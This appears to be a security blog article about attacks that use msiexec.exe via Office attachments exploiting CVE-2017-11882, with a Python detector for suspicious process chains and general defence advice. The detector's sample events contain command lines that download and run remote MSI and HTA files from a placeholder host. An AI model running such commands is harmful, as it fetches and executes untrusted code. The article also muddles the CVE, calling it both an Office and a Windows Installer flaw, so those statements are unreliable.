
Are You Using Windows Installer?


You May Be Sabotaging Yourself!

This latest cyber-attack uses Windows Installer to download malware onto your computers. What is CVE-2017-11882, and what does it do? How should you detect and protect against it? What other similar malware attacks have come up in the past? These are all questions you should be asking yourself in order to develop the best defense against this type of attack.

Windows Installer

It seems like just when we’ve learned how to protect against one type of malware, four others pop up. Recently, Microsoft began combating CVE-2017-11882, which exploited a vulnerability in Microsoft Office. Then, just as expected, as one weakness was fought, a new one popped up. CVE-2017-11882 exploited a new vulnerability within the Windows Installer.

The previous version of CVE-2017-11882

The previous version would exploit the vulnerability using the Windows executable mshta.exe, and then run a PowerShell script which would download and execute the payload. The problem with this is that while previous versions have edited Microsoft Installer, this version doesn’t edit it. What it actually does is use Microsoft Installer for the exact purpose that it was built for: to install things. Only this time it forces it to install malicious programs on your computer.

The new attack uses msiexec.exe as part of the Windows Installer service. For example, the user could receive an email with an attachment. Since the attachment seems legitimate, the user opens and begins downloading it. This attachment installs a malicious MSI package through the use of CVE-2017-11882. This then, in turn, releases either an MSIL or a Delphi binary. This binary will then launch another instance of itself. This duplicate binary is then hollowed out to create a new home for the new malware payload.

How does CVE-2017-11882 go undetected?

This package provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. This is similar to movies where a complicated retina scan is needed to gain access to a specific area of the building, yet the spy is still able to get in, thanks to his fancy contact lens. The system scans the lens, thinks that he is an authorized user, and allows him passage. Similarly, because of this compressed file mask of sorts, it’s hard to detect and identify the actual payload since it is contained in the heavily obfuscated MSIL or Delphi binary.
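Since the package is hard to judge by scanning the file, the process chain described above is a more practical thing to check: msiexec.exe, mshta.exe or PowerShell started by an Office process. The following is an added example, not code from the original article, that applies that check to process-creation records. The event field names and the sample events are constructed for illustration, and example.test is a placeholder host.

```python
import re

# Parents an attachment exploit runs under: Office apps and Equation Editor
# (EQNEDT32.EXE), the Office component affected by CVE-2017-11882.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
# Children named in the article: msiexec.exe (new chain), mshta.exe and PowerShell (previous chain).
SUSPECT_CHILDREN = {"msiexec.exe", "mshta.exe", "powershell.exe"}
# msiexec accepts a URL as the package source for /i or /package.
REMOTE_MSI = re.compile(r"[/-](i|package)\s+\"?https?://", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of reasons this process-creation event is suspicious."""
    reasons = []
    child = basename(event["image"])
    parent = basename(event["parent_image"])
    if child in SUSPECT_CHILDREN and parent in OFFICE_PARENTS:
        reasons.append(f"{child} spawned by {parent}")
    if child == "msiexec.exe" and REMOTE_MSI.search(event["command_line"]):
        reasons.append("msiexec installing package from remote URL")
    return reasons

def scan(events):
    """Return (event, reasons) pairs for every flagged event."""
    return [(e, r) for e in events if (r := classify(e))]

# Constructed sample events; field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "command_line": "msiexec /i http://example.test/pkg.msi /q"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "command_line": "mshta http://example.test/a.hta"},
    {"image": r"C:\Windows\System32\msiexec.exe",   # admin installing a local package
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec /i "C:\Users\admin\Downloads\setup.msi"'},
    {"image": r"C:\Windows\System32\msiexec.exe",   # Windows Installer service itself
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\msiexec.exe /V"},
]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(event["command_line"], "->", "; ".join(reasons))
```

The same two conditions can be expressed as rules in whatever endpoint or SIEM tooling records parent and child process names; the ordinary administrator install and the Windows Installer service in the sample are left unflagged.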

What can we do to protect against CVE-2017-11882?

Sometimes there are simple solutions to significant problems. For example, one of the easiest ways in which you can defend yourself and your business from CVE-2017-11882 is by having a strong email policy for your company. You should use strong passwords, with both capital and lowercase letters, as well as some symbols. You should never write passwords down, or use the same password for multiple accounts. Doing so can result in a hacker not only having access to your email but also to any and all accounts. Also, you should change your passwords often; it is recommended to change them every two months. This way you can stay ahead of the hackers: before they have an opportunity to figure out your password, you will have already changed it.

Email and Passwords

Besides password strength, you should also focus on training employees about the dangers of email attacks, such as those that use the Microsoft Installer. It’s vital that they are trained not to click or open any suspicious emails. For example, employees should be trained to recognize phishing emails that may carry malware, and also to know how to isolate and flag these emails. This way other employees are immediately notified of the email, and won’t themselves fall victim. Employees should always check emails and names of unknown senders to ensure they are legitimate. They should always look for inconsistencies or style red flags such as grammar mistakes, capital letters, or excessive use of punctuation.

Restrict or disable Windows Installer

A second way to protect yourself is by limiting or completely disabling the Windows Installer itself. This would prevent potential attackers from being able to install their malicious software on your users’ systems. This way, only the system administrator could install programs. Controlling the access and spread of these attacks can significantly help your company to protect itself. Rather than trying to put out fires all over the place, you can then focus on one area and defend it appropriately.

Microsoft Recommendations

Microsoft recommends that if you think that you are infected with this malware, you should use your security software to detect and remove the threat. Remember to use appropriate software based on which operating system you are using. Microsoft states that Windows Defender works best for Windows 10 to detect and remove this malware. Microsoft Security Essentials works for Windows 7 and Windows Vista and has the appropriate defense and removal for this malware. After detection and removal, you should update your software to further protect yourself from future exploits.

Similar previous attacks

Attacks like this are not rare in the least. For example, in November of 2017, there was also a vulnerability in Microsoft Office 2000. This flaw allowed hackers to install malware without user interaction. So, while you were just writing a report in Microsoft Word, hackers were downloading malware onto your computer without your knowledge or permission. This could easily be fixed by updating software, such as using only the most recent version of Microsoft Office, so that your computers and networks are protected against the latest threats.

We should stay vigilant, to protect our network and our businesses. Knowing what is out there and what can wreak havoc on your business is half the battle. The other half is updating your staff and your software to ensure that you are providing the most vigorous defense possible. Look for vulnerabilities in your system and business. Additionally, it is crucial to stay up to date with the latest cyber-attack news. This will keep you in the know as far as what is out there, and what potential threats can affect your business.

 
